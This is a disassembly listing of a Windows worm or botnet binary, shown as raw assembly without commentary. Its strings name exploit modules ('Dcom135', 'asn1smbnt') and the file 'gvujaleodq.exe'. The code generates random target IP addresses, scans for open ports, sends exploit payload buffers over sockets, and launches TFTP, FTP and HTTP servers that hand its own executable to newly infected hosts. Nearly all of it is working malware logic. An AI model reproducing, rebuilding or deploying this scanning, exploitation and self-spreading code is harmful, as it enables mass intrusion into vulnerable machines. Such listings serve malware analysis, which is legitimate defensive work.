push 4 ; Size
imul eax, 3Ch
lea eax, dword_41E6B0[eax]
mov [ebp+var_14], eax
push eax ; Src
lea eax, [ebp+var_14E0]
push eax ; Dst
call _memcpy
mov esi, offset Str ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_14D0]
push esi ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_11AC]
push offset dword_41E7F4 ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_11A8]
push [ebp+var_14] ; Src
push eax ; Dst
call _memcpy
add esp, 40h
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_119C]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 10h
xor esi, esi
lea eax, [ebp+var_4803]
loc_401D4D: ; CODE XREF: sub_401B98+1C6�j
mov cl, [ebp+esi+var_1CC4]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, edi
jl short loc_401D4D
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi ; Size
push 31h ; Val
push eax ; Dst
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call _memset
push esi ; Size
lea eax, [ebp+var_68DC]
push 31h ; Val
push eax ; Dst
call _memset
add esp, 18h
jmp short loc_401DEB
; ---------------------------------------------------------------------------
loc_401D94: ; CODE XREF: sub_401B98+118�j
push 7D0h ; Size
lea eax, [ebp+var_F14]
push 90h ; Val
push eax ; Dst
call _memset
mov esi, offset Str ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_E74]
push esi ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_10]
push eax ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_10]
push eax ; Src
lea eax, [ebp+var_758]
push eax ; Dst
call _memcpy
mov eax, dword_41E6B0
add esp, 2Ch
mov [ebp+var_768], eax
loc_401DEB: ; CODE XREF: sub_401B98+1FA�j
push 0E29h ; Size
lea eax, [ebp+var_2CA8]
push 31h ; Val
push eax ; Dst
call _memset
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
add eax, 4
push ebx
push eax
lea eax, [ebp+Dst]
push eax
push edi
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401E2A
loc_401E23: ; CODE XREF: sub_401B98+2B9�j
; sub_401B98+2E0�j ...
xor al, al
jmp loc_401FD2
; ---------------------------------------------------------------------------
loc_401E2A: ; CODE XREF: sub_401B98+289�j
mov esi, 640h
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_42EBCC ; recv
push ebx
push 68h
push offset dword_41E2E4
push edi
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401E23
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_42EBCC ; recv
push ebx
push 0A0h
push offset dword_41E350
push edi
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401E23
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_42EBCC ; recv
cmp [ebp+arg_C0], ebx
jz loc_401F40
push 68h ; Size
lea eax, [ebp+var_89B4]
push offset dword_41E508 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_4804]
push 1B5Ah ; Size
push eax ; Src
lea eax, [ebp+var_894C]
push eax ; Dst
call _memcpy
push 70h ; Size
lea eax, [ebp+var_68DC]
push offset dword_41E574 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_3770]
push 0A5Eh ; Size
push eax ; Src
lea eax, [ebp+var_686C]
push eax ; Dst
call _memcpy
push 84h ; Size
lea eax, [ebp+var_5DA8]
push offset dword_41E5E8 ; Src
push eax ; Dst
call _memcpy
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx
push 10FCh
push eax
push edi
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz loc_401E23
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_42EBCC ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_401F96
; ---------------------------------------------------------------------------
loc_401F40: ; CODE XREF: sub_401B98+2F8�j
push 7Ch ; Size
lea eax, [ebp+var_2CA8]
push offset dword_41E3F4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_F14]
push 7D0h ; Size
push eax ; Src
lea eax, [ebp+var_2C2C]
push eax ; Dst
call _memcpy
push 90h ; Size
lea eax, [ebp+var_245C]
push offset off_41E474 ; Src
push eax ; Dst
call _memcpy
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx
push 0CF8h
loc_401F96: ; CODE XREF: sub_401B98+3A6�j
push eax
push edi
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz loc_401E23
push 12Ch
call ds:dword_41B048 ; Sleep
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_401A39
add esp, 0BCh
test al, al
setnz al
loc_401FD2: ; CODE XREF: sub_401B98+28D�j
pop edi
pop esi
pop ebx
leave
retn
sub_401B98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401FD7(int,char,int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_401FD7 proc near ; CODE XREF: .text:00401773�p
var_854 = byte ptr -854h
var_810 = byte ptr -810h
Dest = byte ptr -214h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
Str = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
mov [ebp+var_4], edi
call _memset
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+Dst], 2
push eax
call dword_42EBF0 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_10], eax
call dword_42EBB4 ; htons
push 6
push 1
push 2
mov [ebp+var_12], ax
call dword_42EC30 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4020D0
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_42EB60 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4020D0
push edi
push 89h
push offset dword_41E068
push ebx
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4020D0
mov esi, 640h
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_42EBCC ; recv
push edi
push 0A8h
push offset dword_41E0F4
push ebx
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4020D0
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_42EBCC ; recv
push edi
push 0DEh
push offset dword_41E1A0
push ebx
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4020D0
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_42EBCC ; recv
movsx eax, [ebp+var_810]
sub eax, 30h
jz short loc_4020DA
dec eax
jz short loc_4020D7
loc_4020D0: ; CODE XREF: sub_401FD7+54�j
; sub_401FD7+6A�j ...
xor eax, eax
jmp loc_40219D
; ---------------------------------------------------------------------------
loc_4020D7: ; CODE XREF: sub_401FD7+F7�j
push edi
jmp short loc_4020FE
; ---------------------------------------------------------------------------
loc_4020DA: ; CODE XREF: sub_401FD7+F4�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_401B98
add esp, 0C4h
test al, al
jnz short loc_40211E
push 1
loc_4020FE: ; CODE XREF: sub_401FD7+101�j
push ebx
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_401B98
add esp, 0C4h
test al, al
jz short loc_402125
loc_40211E: ; CODE XREF: sub_401FD7+123�j
mov [ebp+var_4], 1
loc_402125: ; CODE XREF: sub_401FD7+145�j
push ebx
call dword_42EC48 ; closesocket
cmp [ebp+var_4], 0
jz short loc_40219A
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_B0] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+arg_0] ; int
call sub_405E64
lea eax, [ebp+Dest]
push eax
call sub_402D63
mov eax, [ebp+arg_A8]
add esp, 2Ch
imul eax, 3Ch
inc dword_41F098[eax]
lea eax, dword_41F098[eax]
loc_40219A: ; CODE XREF: sub_401FD7+159�j
push 1
pop eax
loc_40219D: ; CODE XREF: sub_401FD7+FB�j
pop edi
pop esi
pop ebx
leave
retn
sub_401FD7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4021A2(int,char *Str,int)
sub_4021A2 proc near ; CODE XREF: sub_409557+4FFE�p
Source = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+Dest]
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
push eax ; Dest
xor ebx, ebx
call _sprintf
cmp dword_41F090, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_402210
push esi
mov esi, offset dword_41F098
loc_4021D5: ; CODE XREF: sub_4021A2+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+Source]
push offset aSD ; " %s: %d,"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_4021D5
pop esi
loc_402210: ; CODE XREF: sub_4021A2+2B�j
push dword_4750D0
call sub_410D66
push eax
push ebx
lea eax, [ebp+Source]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
lea eax, [ebp+Dest]
push eax
call sub_402D63
add esp, 38h
pop edi
pop ebx
leave
retn
sub_4021A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40226C(int,char *Str,int,int)
sub_40226C proc near ; CODE XREF: sub_409557+4978�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_411E82
test eax, eax
pop ecx
jle short loc_4022A8
mov eax, [ebp+arg_C]
push dword_428D68[eax*8]
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_4022BB
; ---------------------------------------------------------------------------
loc_4022A8: ; CODE XREF: sub_40226C+13�j
lea eax, [ebp+Dest]
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4022BB: ; CODE XREF: sub_40226C+3A�j
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
lea eax, [ebp+Dest]
push eax
call sub_402D63
add esp, 18h
leave
retn
sub_40226C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4022E3(int,int,int,int,char Source,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_4022E3 proc near ; CODE XREF: sub_402A0C+4F�p
var_210 = dword ptr -210h
Dest = byte ptr -204h
var_4 = byte ptr -4
Source = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_402673
imul eax, 3Ch
xor ebx, ebx
cmp dword_41F09C[eax], ebx
jz loc_402554
push 4
call sub_411E82
test eax, eax
pop ecx
jnz loc_402673
mov eax, dword_424A48
push edi
mov edi, offset dword_429D24
push 104h
push edi
push ebx
mov dword_429F34, eax
mov dword_429F30, ebx
call ds:dword_41B068 ; GetModuleFileNameA
push 103h ; Count
mov esi, offset byte_429E28
push offset aGvujaleodq_exe ; "gvujaleodq.exe"
push esi ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_429D20, eax
mov eax, [ebp+arg_138]
push 7Fh ; Count
mov dword_429FB8, eax
jnz short loc_402396
lea eax, [ebp+Source]
push eax ; Source
push offset byte_429F38 ; Dest
call _strncpy
add esp, 0Ch
mov dword_429FBC, 1
jmp short loc_4023B0
; ---------------------------------------------------------------------------
loc_402396: ; CODE XREF: sub_4022E3+94�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_429F38 ; Dest
call _strncpy
add esp, 0Ch
mov dword_429FBC, ebx
loc_4023B0: ; CODE XREF: sub_4022E3+B1�j
push esi
push edi
push dword_429F34
lea eax, [ebp+Dest]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push 4 ; int
push eax ; Source
call sub_411C3A
add esp, 20h
mov dword_429F2C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_429D20
push offset sub_411743
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, dword_429F2C
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40241F
loc_40240D: ; CODE XREF: sub_4022E3+13A�j
cmp dword_429FC0, ebx
jnz short loc_40243A
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40240D
; ---------------------------------------------------------------------------
loc_40241F: ; CODE XREF: sub_4022E3+128�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset aTftpFailedToSt ; "[TFTP]: Failed to start server, error: "...
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40243A: ; CODE XREF: sub_4022E3+130�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
mov edi, offset dword_42A37C
mov [esp+210h+var_210], 104h
push edi
push ebx
mov dword_42A588, ebx
call ds:dword_41B068 ; GetModuleFileNameA
push 103h ; Count
mov esi, offset byte_42A480
push offset aGvujaleodq_exe ; "gvujaleodq.exe"
push esi ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_42A378, eax
mov eax, [ebp+arg_138]
push 7Fh ; Count
mov dword_42A610, eax
jnz short loc_4024B5
lea eax, [ebp+Source]
push eax ; Source
push offset byte_42A590 ; Dest
call _strncpy
add esp, 0Ch
mov dword_42A614, 1
jmp short loc_4024CF
; ---------------------------------------------------------------------------
loc_4024B5: ; CODE XREF: sub_4022E3+1B3�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_42A590 ; Dest
call _strncpy
add esp, 0Ch
mov dword_42A614, ebx
loc_4024CF: ; CODE XREF: sub_4022E3+1D0�j
push esi
push edi
push dword_42A58C
lea eax, [ebp+Dest]
push offset aFtpServerStart ; "[FTP]: Server started on Port: %d, File"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push 5 ; int
push eax ; Source
call sub_411C3A
add esp, 20h
mov dword_42A584, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42A378
push offset sub_404059
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, dword_42A584
pop edi
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_402543
loc_40252D: ; CODE XREF: sub_4022E3+25E�j
cmp dword_42A618, ebx
jnz loc_402666
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40252D
; ---------------------------------------------------------------------------
loc_402543: ; CODE XREF: sub_4022E3+248�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
jmp loc_402657
; ---------------------------------------------------------------------------
loc_402554: ; CODE XREF: sub_4022E3+25�j
cmp dword_41F0A0[eax], ebx
jz loc_402673
push 3
call sub_411E82
test eax, eax
pop ecx
jnz loc_402673
mov esi, offset byte_42A254
push 104h
push esi
push ebx
call ds:dword_41B068 ; GetModuleFileNameA
push 5Ch ; Ch
push esi ; Str
call _strrchr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_402592
mov [eax], bl
loc_402592: ; CODE XREF: sub_4022E3+2AB�j
mov eax, dword_424A4C
mov dword_42A36C, ebx
mov dword_42A358, eax
lea eax, [ebp+Source]
push eax ; Format
push offset Dest ; Dest
call _sprintf
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov dword_429FC8, eax
mov ecx, [ebp+arg_138]
push esi
push dword_42A358
mov dword_42A364, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_42A368, ecx
call sub_408401
pop ecx
push eax
lea eax, [ebp+Dest]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push 3 ; int
push eax ; Source
call sub_411C3A
add esp, 20h
mov dword_42A360, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_429FC8
push offset sub_404771
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, dword_42A360
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40264B
loc_402639: ; CODE XREF: sub_4022E3+366�j
cmp dword_42A374, ebx
jnz short loc_402666
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_402639
; ---------------------------------------------------------------------------
loc_40264B: ; CODE XREF: sub_4022E3+354�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedToS ; "[HTTPD]: Failed to start server, error:"...
loc_402657: ; CODE XREF: sub_4022E3+26C�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_402666: ; CODE XREF: sub_4022E3+250�j
; sub_4022E3+35C�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
pop ecx
loc_402673: ; CODE XREF: sub_4022E3+14�j
; sub_4022E3+35�j ...
pop esi
pop ebx
leave
retn
sub_4022E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402677(int Dst)
sub_402677 proc near ; CODE XREF: sub_4027F8:loc_402869�p
Dst = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+Dst]
push esi
push 4 ; Size
lea esi, ds:428D68h[eax*8]
lea eax, [ebp+Dst]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_42EAF8 ; htonl
inc eax
push eax
mov [ebp+Dst], eax
call dword_42EBB0 ; htonl
mov [ebp+Dst], eax
lea eax, [ebp+Dst]
push 4 ; Size
push eax ; Src
push esi ; Dst
call _memcpy
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_402677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4026BF(char *Src,int)
sub_4026BF proc near ; CODE XREF: sub_4027F8+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+Src] ; Str
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call _strlen
cmp eax, 0Fh
pop ecx
jbe short loc_4026E7
xor eax, eax
jmp short loc_402758
; ---------------------------------------------------------------------------
loc_4026E7: ; CODE XREF: sub_4026BF+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+Src] ; Src
call _sscanf
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_402714
call _rand
mov [ebp+var_C], eax
loc_402714: ; CODE XREF: sub_4026BF+4B�j
cmp [ebp+var_8], esi
jnz short loc_402721
call _rand
mov [ebp+var_8], eax
loc_402721: ; CODE XREF: sub_4026BF+58�j
cmp [ebp+var_4], esi
jnz short loc_40272E
call _rand
mov [ebp+var_4], eax
loc_40272E: ; CODE XREF: sub_4026BF+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40273A
call _rand
loc_40273A: ; CODE XREF: sub_4026BF+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_428D68[ecx*8], eax
loc_402758: ; CODE XREF: sub_4026BF+26�j
pop esi
leave
retn
sub_4026BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40275B proc near ; CODE XREF: sub_4027F8+B8�p
; sub_403EEB+30�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_42EC30 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_402784
xor eax, eax
jmp short loc_4027F3
; ---------------------------------------------------------------------------
loc_402784: ; CODE XREF: sub_40275B+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_42EBB4 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_42EC4C ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_42EB60 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_42EB9C ; select
push esi
mov edi, eax
call dword_42EC48 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_4027F3: ; CODE XREF: sub_40275B+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40275B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027F8 proc near ; DATA XREF: sub_402A0C+13B�o
var_2A8 = dword ptr -2A8h
Dest = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
Src = byte ptr -150h
var_140 = byte ptr -140h
Str = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+Src]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_41B078 ; GetTickCount
push eax
call sub_41274C
mov ebx, esi
pop ecx
imul ebx, 234h
loc_40283F: ; CODE XREF: sub_4027F8+200�j
mov eax, dword_430544[ebx]
cmp dword_428D6C[eax*8], 0
jz loc_4029FD
cmp [ebp+var_10], 0
push eax ; Dst
jz short loc_402869
lea eax, [ebp+Src]
push eax ; Src
call sub_4026BF
pop ecx
jmp short loc_40286E
; ---------------------------------------------------------------------------
loc_402869: ; CODE XREF: sub_4027F8+60�j
call sub_402677
loc_40286E: ; CODE XREF: sub_4027F8+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword_430544[ebx]
push [ebp+var_3C]
push edi
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax ; Format
lea eax, dword_430340[ebx]
push eax ; Dest
call _sprintf
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_40275B
add esp, 2Ch
cmp eax, 1
jnz loc_4029ED
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_402942
push offset dword_429D08
call ds:dword_41B074 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_402924
cmp [ebp+Str], 0
push 1 ; int
push [ebp+var_18] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Str]
jnz short loc_402918
lea eax, [ebp+var_140]
loc_402918: ; CODE XREF: sub_4027F8+118�j
push eax ; Str
push [ebp+var_40] ; int
call sub_405E64
add esp, 14h
loc_402924: ; CODE XREF: sub_4027F8+FD�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
mov [esp+2A8h+var_2A8], offset dword_429D08
call ds:dword_41B070 ; RtlLeaveCriticalSection
jmp loc_4029ED
; ---------------------------------------------------------------------------
loc_402942: ; CODE XREF: sub_4027F8+CD�j
push edi
call dword_42EC3C ; inet_ntoa
push eax ; Format
lea eax, [ebp+var_208]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aAsn1smbnt ; "asn1smbnt"
push eax ; Format
lea eax, [ebp+var_178]
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+Str], 0
lea eax, [ebp+Str]
jnz short loc_402986
lea eax, [ebp+var_140]
loc_402986: ; CODE XREF: sub_4027F8+186�j
push eax ; Format
lea eax, [ebp+var_1F8]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
sub esp, 0BCh
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call off_41F094[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_4029ED: ; CODE XREF: sub_4027F8+C3�j
; sub_4027F8+145�j
push 7D0h
call ds:dword_41B048 ; Sleep
jmp loc_40283F
; ---------------------------------------------------------------------------
loc_4029FD: ; CODE XREF: sub_4027F8+55�j
push esi
call sub_411F56
pop ecx
push 0
call ds:dword_41B06C ; ExitThread
sub_4027F8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A0C proc near ; DATA XREF: sub_409557+2B60�o
; sub_409557+449E�o
var_1DC = dword ptr -1DCh
Source = byte ptr -1CCh
var_14C = byte ptr -14Ch
Str = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call dword_42EBF0 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
